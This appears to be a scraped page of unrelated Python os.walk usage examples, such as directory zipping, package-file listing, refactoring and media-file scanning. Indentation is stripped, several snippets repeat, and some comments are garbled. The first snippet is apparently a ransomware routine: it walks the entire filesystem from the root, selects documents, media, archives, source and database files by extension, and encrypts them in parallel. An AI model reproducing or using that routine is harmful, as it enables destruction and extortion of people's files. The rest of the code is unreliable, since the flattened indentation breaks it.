def select_files():
ext = [".3g2", ".3gp", ".asf", ".asx", ".avi", ".flv",
".m2ts", ".mkv", ".mov", ".mp4", ".mpg", ".mpeg",
".rm", ".swf", ".vob", ".wmv" ".docx", ".pdf",".rar",
".jpg", ".jpeg", ".png", ".tiff", ".zip", ".7z", ".exe",
".tar.gz", ".tar", ".mp3", ".sh", ".c", ".cpp", ".h",
".gif", ".txt", ".py", ".pyc", ".jar", ".sql", ".bundle",
".sqlite3", ".html", ".php", ".log", ".bak", ".deb"]
files_to_enc = []
for root, dirs, files in os.walk("/"):
for file in files:
if file.endswith(tuple(ext)):
files_to_enc.append(os.path.join(root, file))
# Parallelize execution of encryption function over four subprocesses
pool = Pool(processes=4)
pool.map(single_arg_encrypt_file, files_to_enc)
python类walk()的实例源码
def zipdir(archivename, basedir):
'''Zip directory, from J.F. Sebastian http://stackoverflow.com/'''
assert os.path.isdir(basedir)
with closing(ZipFile(archivename, "w", ZIP_DEFLATED)) as z:
for root, dirs, files in os.walk(basedir):
#NOTE: ignore empty directories
for fn in files:
if fn[-4:]!='.zip':
absfn = os.path.join(root, fn)
zfn = absfn[len(basedir)+len(os.sep):] #XXX: relative path
z.write(absfn, zfn)
# ================ Inventory input data and create data structure =================
def zip_dir(directory):
"""zip a directory tree into a BytesIO object"""
result = io.BytesIO()
dlen = len(directory)
with ZipFile(result, "w") as zf:
for root, dirs, files in os.walk(directory):
for name in files:
full = os.path.join(root, name)
rel = root[dlen:]
dest = os.path.join(rel, name)
zf.write(full, dest)
return result
#
# Simple progress bar
#
def load_data(self):
# work in the parent of the pages directory, because we
# want the filenames to begin "pages/...".
chdir(dirname(self.setup.pages_dir))
rel = relpath(self.setup.pages_dir)
for root, dirs, files in walk(rel):
for filename in files:
start, ext = splitext(filename)
if ext in self.setup.data_extensions:
#yield root, dirs, filename
loader = self.setup.data_loaders.get(ext)
path = join(root,filename)
if not loader:
raise SetupError("Identified data file '%s' by type '%s' but no loader found" % (filename, ext))
data_key = join(root, start)
loaded_dict = loader.loadf(path)
self.data[data_key] = loaded_dict
#self.setup.log.debug("data key [%s] ->" % (data_key, ), root, filename, ); pprint.pprint(loaded_dict, sys.stdout)
#pprint.pprint(self.data, sys.stdout)
#print("XXXXX data:", self.data)
def prepare_zip():
from pkg_resources import resource_filename as resource
from config import config
from json import dumps
logger.info('creating/updating gimel.zip')
with ZipFile('gimel.zip', 'w', ZIP_DEFLATED) as zipf:
info = ZipInfo('config.json')
info.external_attr = 0o664 << 16
zipf.writestr(info, dumps(config))
zipf.write(resource('gimel', 'config.py'), 'config.py')
zipf.write(resource('gimel', 'gimel.py'), 'gimel.py')
zipf.write(resource('gimel', 'logger.py'), 'logger.py')
for root, dirs, files in os.walk(resource('gimel', 'vendor')):
for file in files:
real_file = os.path.join(root, file)
relative_file = os.path.relpath(real_file,
resource('gimel', ''))
zipf.write(real_file, relative_file)
def zipdir(path, zipn):
for root, dirs, files in os.walk(path):
for file in files:
zipn.write(os.path.join(root, file))
def gen_data_files(src_dir):
"""
generates a list of files contained in the given directory (and its
subdirectories) in the format required by the ``package_data`` parameter
of the ``setuptools.setup`` function.
Parameters
----------
src_dir : str
(relative) path to the directory structure containing the files to
be included in the package distribution
Returns
-------
fpaths : list(str)
a list of file paths
"""
fpaths = []
base = os.path.dirname(src_dir)
for root, dir, files in os.walk(src_dir):
if len(files) != 0:
for f in files:
fpaths.append(os.path.relpath(os.path.join(root, f), base))
return fpaths
def clearpyc(root, patterns='*',single_level=False, yield_folders=False):
"""
root: ??¼
patterns ???????
single_level: ???¼??
yield_folders: ??¼??
"""
patterns = patterns.split(';')
for path, subdirs, files in os.walk(root):
if yield_folders:
files.extend(subdirs)
files.sort()
for name in files:
for pattern in patterns:
if fnmatch.fnmatch(name, pattern.strip()):# ?pattern???
yield os.path.join(path, name)
if single_level:
break
def get_distribution_names(self):
"""
Return all the distribution names known to this locator.
"""
result = set()
for root, dirs, files in os.walk(self.base_dir):
for fn in files:
if self.should_include(fn, root):
fn = os.path.join(root, fn)
url = urlunparse(('file', '',
pathname2url(os.path.abspath(fn)),
'', '', ''))
info = self.convert_url_to_download_info(url, None)
if info:
result.add(info['name'])
if not self.recursive:
break
return result
def test_pydist():
"""Make sure pydist.json exists and validates against our schema."""
# XXX this test may need manual cleanup of older wheels
import jsonschema
def open_json(filename):
return json.loads(open(filename, 'rb').read().decode('utf-8'))
pymeta_schema = open_json(resource_filename('wheel.test',
'pydist-schema.json'))
valid = 0
for dist in ("simple.dist", "complex-dist"):
basedir = pkg_resources.resource_filename('wheel.test', dist)
for (dirname, subdirs, filenames) in os.walk(basedir):
for filename in filenames:
if filename.endswith('.whl'):
whl = ZipFile(os.path.join(dirname, filename))
for entry in whl.infolist():
if entry.filename.endswith('/metadata.json'):
pymeta = json.loads(whl.read(entry).decode('utf-8'))
jsonschema.validate(pymeta, pymeta_schema)
valid += 1
assert valid > 0, "No metadata.json found"
def get_all_pages(self):
# work in the parent of the pages directory, because we
# want the filenames to begin "pages/...".
chdir(dirname(self.setup.pages_dir))
rel = relpath(self.setup.pages_dir)
for root, dirs, files in walk(rel): # self.config.pages_dir):
# examples:
#
# root='pages' root='pages/categories'
# dirs=['categories'] dirs=[]
# files=['index.html'] files=['list.html']
# self.setup.log.debug("\nTEMPLATE ROOT: %s" % root)
# self.setup.log.debug("TEMPLATE DIRS: %s" % dirs)
# self.setup.log.debug("TEMPLATE FILENAMES: %s" % files)
# #dir_context = global_context.new_child(data_tree[root])
for filename in files:
start, ext = splitext(filename)
if ext in self.setup.template_extensions:
# if filename.endswith(".html"): # TODO: should this filter be required at all?
yield Page(self.setup, filename, join(root, filename))
def get_distribution_names(self):
"""
Return all the distribution names known to this locator.
"""
result = set()
for root, dirs, files in os.walk(self.base_dir):
for fn in files:
if self.should_include(fn, root):
fn = os.path.join(root, fn)
url = urlunparse(('file', '',
pathname2url(os.path.abspath(fn)),
'', '', ''))
info = self.convert_url_to_download_info(url, None)
if info:
result.add(info['name'])
if not self.recursive:
break
return result
def zip_dir(directory):
"""zip a directory tree into a BytesIO object"""
result = io.BytesIO()
dlen = len(directory)
with ZipFile(result, "w") as zf:
for root, dirs, files in os.walk(directory):
for name in files:
full = os.path.join(root, name)
rel = root[dlen:]
dest = os.path.join(rel, name)
zf.write(full, dest)
return result
#
# Simple progress bar
#
def unpack_directory(filename, extract_dir, progress_filter=default_filter):
""""Unpack" a directory, using the same interface as for archives
Raises ``UnrecognizedFormat`` if `filename` is not a directory
"""
if not os.path.isdir(filename):
raise UnrecognizedFormat("%s is not a directory" % filename)
paths = {
filename: ('', extract_dir),
}
for base, dirs, files in os.walk(filename):
src, dst = paths[base]
for d in dirs:
paths[os.path.join(base, d)] = src + d + '/', os.path.join(dst, d)
for f in files:
target = os.path.join(dst, f)
target = progress_filter(src + f, target)
if not target:
# skip non-files
continue
ensure_directory(target)
f = os.path.join(base, f)
shutil.copyfile(f, target)
shutil.copystat(f, target)
def find_problems(problem_path):
"""
Find all problems that exist under the given root.
We consider any directory with a problem.json to be an intended problem directory.
Args:
problem_path: the problem directory
Returns:
A list of problem paths returned from get_problem.
"""
problem_paths = []
for root, _, files in os.walk(problem_path):
if "problem.json" in files and "__staging" not in root:
problem_paths.append(root)
return problem_paths
def files_from_directory(directory, recurse=True, permissions=0o664):
"""
Returns a list of File objects for every file in a directory. Can recurse optionally.
Args:
directory: The directory to add files from
recurse: Whether or not to recursively add files. Defaults to true
permissions: The default permissions for the files. Defaults to 0o664.
"""
result = []
for root, dirnames, filenames in os.walk(directory):
for filename in filenames:
result.append(File(join(root, filename), permissions))
if not recurse:
break
return result
def get_unignored_file_paths(cls, ignore_list=None, white_list=None):
config = cls.get_config()
ignore_list = ignore_list or config[0]
white_list = white_list or config[1]
unignored_files = []
for root, dirs, files in os.walk("."):
logger.debug("Root:%s, Dirs:%s", root, dirs)
if cls._ignore_path(unix_style_path(root), ignore_list, white_list):
dirs[:] = []
logger.debug("Ignoring directory : %s", root)
continue
for file_name in files:
file_path = unix_style_path(os.path.join(root, file_name))
if cls._ignore_path(file_path, ignore_list, white_list):
logger.debug("Ignoring file : %s", file_name)
continue
unignored_files.append(os.path.join(root, file_name))
return unignored_files
def __processDir(self):
"""
Looks for Makefiles in the given directory and all the sub-directories
if recursive is set to true
"""
self.__log("Processing directory %s" % self.__tgt)
# if recurse, then use walk otherwise do current directory only
if self.__recurse:
for (path, dirs, files) in os.walk(self.__tgt):
for curr_file in files:
# if the file is a Makefile added to process
if curr_file == __PATTERN__:
fname = os.path.join(path, curr_file)
self.__make_files.append(fname)
self.__log("Adding %s to list" % fname)
else:
# just care to find Makefiles in this directory
files = os.listdir(self.__tgt)
if __PATTERN__ in files:
fname = os.path.join(self.__tgt, __PATTERN__)
self.__log("Appending %s to the list" % fname)
self.__make_files.append(fname)
def get_sqls(self):
"""This function extracts sqls from the java files with mybatis sqls.
Returns:
A list of :class:`SQL`. For example:
[SQL('', u'select a.id, b.name from db.ac a join db.bc b on a.id=b.id or a.id=b.iid where a.cnt > 10')]
"""
sqls = []
for root, dirs, files in os.walk(self.dir):
for file in files:
if not file.endswith('.java'):
continue
with codecs.open(os.path.join(root, file), 'r', encoding=self.encoding) as f:
sqls.extend(MybatisInlineSqlExtractor.get_selects_from_text(MybatisInlineSqlExtractor.remove_comment(f.read())))
return sqls
def refactor_dir(self, dir_name, write=False, doctests_only=False):
"""Descends down a directory and refactor every Python file found.
Python files are assumed to have a .py extension.
Files and subdirectories starting with '.' are skipped.
"""
py_ext = os.extsep + "py"
for dirpath, dirnames, filenames in os.walk(dir_name):
self.log_debug("Descending into %s", dirpath)
dirnames.sort()
filenames.sort()
for name in filenames:
if (not name.startswith(".") and
os.path.splitext(name)[1] == py_ext):
fullname = os.path.join(dirpath, name)
self.refactor_file(fullname, write, doctests_only)
# Modify dirnames in-place to remove subdirs with leading dots
dirnames[:] = [dn for dn in dirnames if not dn.startswith(".")]
def remove_folder(self, folder):
"""Delete the named folder, which must be empty."""
path = os.path.join(self._path, '.' + folder)
for entry in os.listdir(os.path.join(path, 'new')) + \
os.listdir(os.path.join(path, 'cur')):
if len(entry) < 1 or entry[0] != '.':
raise NotEmptyError('Folder contains message(s): %s' % folder)
for entry in os.listdir(path):
if entry != 'new' and entry != 'cur' and entry != 'tmp' and \
os.path.isdir(os.path.join(path, entry)):
raise NotEmptyError("Folder contains subdirectory '%s': %s" %
(folder, entry))
for root, dirs, files in os.walk(path, topdown=False):
for entry in files:
os.remove(os.path.join(root, entry))
for entry in dirs:
os.rmdir(os.path.join(root, entry))
os.rmdir(path)
def find_media_files(media_path):
unconverted = []
for dirname, directories, files in os.walk(media_path):
for file in files:
#skip hidden files
if file.startswith('.'):
continue
if is_video(file) or is_subtitle(file):
file = os.path.join(dirname, file)
#Skip Sample files
if re.search(".sample.",file,re.I):
continue
unconverted.append(file)
sorted_unconvered = sorted(unconverted)
return sorted_unconvered
def get_latest_data_subdir(pattern=None, take=-1):
def get_date(f):
return os.stat(os.path.join(BASE_DATA_DIR, f)).st_mtime
try:
dirs = next(os.walk(BASE_DATA_DIR))[1]
except StopIteration:
return None
if pattern is not None:
dirs = (d for d in dirs if pattern in d)
dirs = list(sorted(dirs, key=get_date))
if len(dirs) == 0:
return None
return dirs[take]
def garbage_collection():
global garbage_count, garbage_list
garbage_count = 0
garbage_list = ''
for root, dirs, targets in os.walk(media_path):
for target_name in targets:
if target_name.endswith(garbage):
garbage_count += 1
fullpath = os.path.normpath(os.path.join(str(root), str(target_name)))
garbage_list = garbage_list + "\n" + (str(garbage_count) + ': ' + fullpath)
os.remove(fullpath)
if garbage_count == 0:
print ("\nGarbage Collection: There was no garbage found!")
elif garbage_count == 1:
print ("\nGarbage Collection: The following file was deleted:")
else:
print ("\nGarbage Collection: The following " + str(garbage_count) + " files were deleted:")
print garbage_list
# Log various session statistics
def list_image(root, recursive, exts):
i = 0
if recursive:
cat = {}
for path, dirs, files in os.walk(root, followlinks=True):
dirs.sort()
files.sort()
for fname in files:
fpath = os.path.join(path, fname)
suffix = os.path.splitext(fname)[1].lower()
if os.path.isfile(fpath) and (suffix in exts):
if path not in cat:
cat[path] = len(cat)
yield (i, os.path.relpath(fpath, root), cat[path])
i += 1
for k, v in sorted(cat.items(), key=lambda x: x[1]):
print(os.path.relpath(k, root), v)
else:
for fname in sorted(os.listdir(root)):
fpath = os.path.join(root, fname)
suffix = os.path.splitext(fname)[1].lower()
if os.path.isfile(fpath) and (suffix in exts):
yield (i, os.path.relpath(fpath, root), 0)
i += 1
def reseed(self, netdb):
"""Compress netdb entries and set content"""
zip_file = io.BytesIO()
dat_files = []
for root, dirs, files in os.walk(netdb):
for f in files:
if f.endswith(".dat"):
# TODO check modified time
# may be not older than 10h
dat_files.append(os.path.join(root, f))
if len(dat_files) == 0:
raise PyseederException("Can't get enough netDb entries")
elif len(dat_files) > 75:
dat_files = random.sample(dat_files, 75)
with ZipFile(zip_file, "w", compression=ZIP_DEFLATED) as zf:
for f in dat_files:
zf.write(f, arcname=os.path.split(f)[1])
self.FILE_TYPE = 0x00
self.CONTENT_TYPE = 0x03
self.CONTENT = zip_file.getvalue()
self.CONTENT_LENGTH = len(self.CONTENT)
def QA_save_tdx_to_mongo(file_dir, client=QA_Setting.client):
reader = TdxMinBarReader()
__coll = client.quantaxis.stock_min_five
for a, v, files in os.walk(file_dir):
for file in files:
if (str(file)[0:2] == 'sh' and int(str(file)[2]) == 6) or \
(str(file)[0:2] == 'sz' and int(str(file)[2]) == 0) or \
(str(file)[0:2] == 'sz' and int(str(file)[2]) == 3):
QA_util_log_info('Now_saving ' + str(file)
[2:8] + '\'s 5 min tick')
fname = file_dir + '\\' + file
df = reader.get_df(fname)
df['code'] = str(file)[2:8]
df['market'] = str(file)[0:2]
df['datetime'] = [str(x) for x in list(df.index)]
df['date'] = [str(x)[0:10] for x in list(df.index)]
df['time_stamp'] = df['datetime'].apply(
lambda x: QA_util_time_stamp(x))
df['date_stamp'] = df['date'].apply(
lambda x: QA_util_date_stamp(x))
data_json = json.loads(df.to_json(orient='records'))
__coll.insert_many(data_json)
def get_distribution_names(self):
"""
Return all the distribution names known to this locator.
"""
result = set()
for root, dirs, files in os.walk(self.base_dir):
for fn in files:
if self.should_include(fn, root):
fn = os.path.join(root, fn)
url = urlunparse(('file', '',
pathname2url(os.path.abspath(fn)),
'', '', ''))
info = self.convert_url_to_download_info(url, None)
if info:
result.add(info['name'])
if not self.recursive:
break
return result
def zip_dir(directory):
"""zip a directory tree into a BytesIO object"""
result = io.BytesIO()
dlen = len(directory)
with ZipFile(result, "w") as zf:
for root, dirs, files in os.walk(directory):
for name in files:
full = os.path.join(root, name)
rel = root[dlen:]
dest = os.path.join(rel, name)
zf.write(full, dest)
return result
#
# Simple progress bar
#
def create_zipfile(self, filename):
zip_file = zipfile.ZipFile(filename, "w")
try:
self.mkpath(self.target_dir) # just in case
for root, dirs, files in os.walk(self.target_dir):
if root == self.target_dir and not files:
raise DistutilsOptionError(
"no files found in upload directory '%s'"
% self.target_dir)
for name in files:
full = os.path.join(root, name)
relative = root[len(self.target_dir):].lstrip(os.path.sep)
dest = os.path.join(relative, name)
zip_file.write(full, dest)
finally:
zip_file.close()